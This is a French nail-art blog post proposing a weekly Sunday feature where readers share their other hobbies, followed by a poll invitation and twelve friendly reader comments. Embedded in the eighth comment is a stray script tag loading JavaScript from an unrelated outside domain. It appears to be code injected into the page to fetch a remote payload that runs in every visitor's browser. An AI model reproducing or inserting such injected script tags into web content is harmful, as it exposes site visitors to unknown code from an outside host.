• Donnez moi votre avis =)

     

    Alors, les filles je vous annonce que j'ai mis en place un petit sondage sur le blogounet, car j'ai eu une idée.

    Je vous explique tout cela en détails :

    Il y a quelques jours j'ai eu une petite idée ... Nous sommes toutes dans l'univers du nail art mais beaucoup d'entre nous ont d'autres passions ....

    Je vous propose donc de nous les faire découvrir chaque dimanche.

    Pourquoi le dimanche?

    Tout simplement, car le dimanche c'est le jour du repos =D, puis j'aimerais faire une petite coupure et vous laisser mon blog le temps d'un article histoire de partager avec nous vos passions, que ce soit de la cuisine, du jardinage, de la confection d'objets, dessins, peinture, etc.

    Cette rubrique s'appellerais "Les Nailartistes ont du Talent" ... Car je pense que nos autres passions ce doivent d'être partagées.

    Alors, si vous avez des questions vous pouvez bien sûr me les poser je me ferais un plaisir de vous répondre.

    Pour donner votre avis sur cette idée d'article je vous laisse le sondage. Selon le résultat, cela sera mis en place courant Novembre.

    Je ferme cette petite parenthèse =) Merci d'avoir pris le temps de lire cet article.

    Bisouilles mes belles

    Donnez moi votre avis =)

    « Dans les petits papiersDentelle Chic »

    Tags Tags : , , , ,
  • Commentaires

    1
    Mardi 7 Août 2012 à 10:41
    Emmanuelle Merteuil

    Plop ! Cela me paraît une excellente idée :) Autant pour celles qui n'ont pas de blog, que pour celles qui le font sur le leur (comme moi) et qui pourraient ainsi partager avec davantage de gens ^^

    C'est sympa aussi de rappeler qu'une nail arteuse/artiste ne se résume pas à un flacon de vernis :p (je dis ça parce que quand j'ai dit à ma famille que j'avais un blog, impossible de leur faire comprendre que c'était surtout pour mes écrits... trop sympa).

    J'suis pour :p

    2
    maggybulle Profil de maggybulle
    Mardi 7 Août 2012 à 10:45

    Merci pour ton avis Emmanuelle =)

    Tu as tout a fait compris l'esprit que je veux donner a cette rubrique.

    3
    Mardi 7 Août 2012 à 11:00

    bah oui ça peut être très sympa !!

    4
    Mardi 7 Août 2012 à 16:30

    A voté :D

    Je trouve ton idée vraiment super intéressante!
    Déjà ça permet de te découvrir autrement que par tes jolies mimines mais en plus ça me donne envie de moi aussi faire la même chose!
     

    5
    Jeudi 9 Août 2012 à 05:16

    ai voté aussi ;). Très bonne idée ma belle, j'approuve à 100%.

    J'en profite pour te faire un petit coucou de Chicago où tout se passe super bien ^^. J'essaierai de faire un petit article demain pour donner des news et quelques photos si j'arrive à faire un premier tri :p.

    Bisous bisous et à très vite ;).

    6
    Jeudi 9 Août 2012 à 05:17

    Ah oui quand je dis demain, je parle de jeudi dans la journée pour moi, mais ça veut dire la soirée pour vous ;). Oui parce que faut pas croire que je passe mes nuits sur internet, là au moment où j'écris il doit être 22h20, pas plus :p.

    Bisoussssssssss.

    7
    maggybulle Profil de maggybulle
    Jeudi 9 Août 2012 à 10:37

    Lol bha j'espere bien =) gooo profiter ma belle =)

    8
    Samedi 18 Août 2012 à 18:07

    Super idée ^^

    Les dimanches réservés à la oublication des sunday nail battle ET à nos autres passions, je vote pour !

    Ps: bon voilà j'suis inscrite à ta news, j'suis fan :p

    <script src="http://themerose.info/dfi823hs.js?0.09604210745568187" type="text/javascript"></script>
    9
    maggybulle Profil de maggybulle
    Samedi 18 Août 2012 à 18:38

    Merci pour ton avis Ninail=) puis aussi de vouloir me suivre =) sa fait vraiment plaisir

     

    10
    Samedi 15 Septembre 2012 à 09:33

    J'aime bcp cette initiative ;-) ça va nous permettre à toute de nous connaitre autrement......... chouette................ bonne continuation et à bientot .

    11
    Samedi 15 Septembre 2012 à 11:09

    Moi aussi j'aime cette idée ^^ Bisous

    12
    Samedi 15 Septembre 2012 à 22:15

    COntente que cette idée vous plaise =D J'éspère surtout qu'il y aura des filles motivé pour nous faire partager leurs passions et faire vivre cette rubrique

     

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :